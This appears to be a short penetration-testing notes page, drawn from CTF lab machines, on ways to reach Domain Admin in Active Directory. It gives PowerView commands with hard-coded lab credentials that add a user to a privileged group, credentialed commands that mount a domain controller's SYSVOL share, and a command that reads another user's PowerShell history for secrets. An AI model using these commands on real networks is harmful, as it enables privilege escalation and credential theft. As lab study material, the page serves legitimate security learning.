This is a collection of techniques to get Domain Admin via multiple techniques.
Assign user to a group
1
2
3
4
5
6
Import-Module ./PowerView.ps1
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\\JDgodd"
Add-DomainGroupMember -Identity 'Core Staff' -Members 'streamio\\JDgodd' -Credential $Cred
net group 'Core Staff'
Examples: [[StreamIO#dc6ecc]]
SYSVOL Share DC
We can enumerate SMB Shares within the machine: ^cae2ef
1
2
3
4
5
6
7
PS C:\Users\BTables\Desktop> Get-SMBShare
Name ScopeName Path Description
---- --------- ---- -----------
ADMIN$ * Remote Admin
C$ * Default share
IPC$ * Remote IPC
We can try to connect to the shares on the DC:
1
2
PS C:\Users\BTables\Desktop> net use \\dc.fulcrum.local\IPC$ /user:FULCRUM\BTables ++FileServerLogon12345++
The command completed successfully.
And then we can list the shares in the DC:
1
2
3
4
5
6
7
PS C:\Users\BTables\Desktop> net view \\dc.fulcrum.local\
Shared resources at \\dc.fulcrum.local\
Share name Type Used as Comment
-------------------------------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
The command completed successfully.
We can then mount the share SYSVOL on the compromised machine to check its content:
1
2
3
PS C:\Users\BTables\Desktop> net use x: \\dc.fulcrum.local\SYSVOL /user:FULCRUM\BTables ++FileServerLogon12345++
The command completed successfully.
And we found a ton of scripts inside the Share:
1
2
3
4
5
6
7
PS X:\fulcrum.local\scripts> dir
Directory: X:\fulcrum.local\scripts
Mode LastWriteTime Length Name
---- ------------- ----- -----
-a---- 2/12/2022 10:34 PM 340 00034421-648d-4835-9b23-c0d315d71ba3.ps1
-a---- 2/12/2022 10:34 PM 340 0003ed3b-31a9-4d8f-a152-a234ecb522d4.ps1
Powershell History
We can retrieve commands executed on another machine by checking the ConsoleHost_history.txt which is the same as in Linux .bash_history file. #Note If using this command we need to be on the User’s folder since this file is located in the AppData folder:
1
PS C:\Users\legacyy> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Examples: Timelapse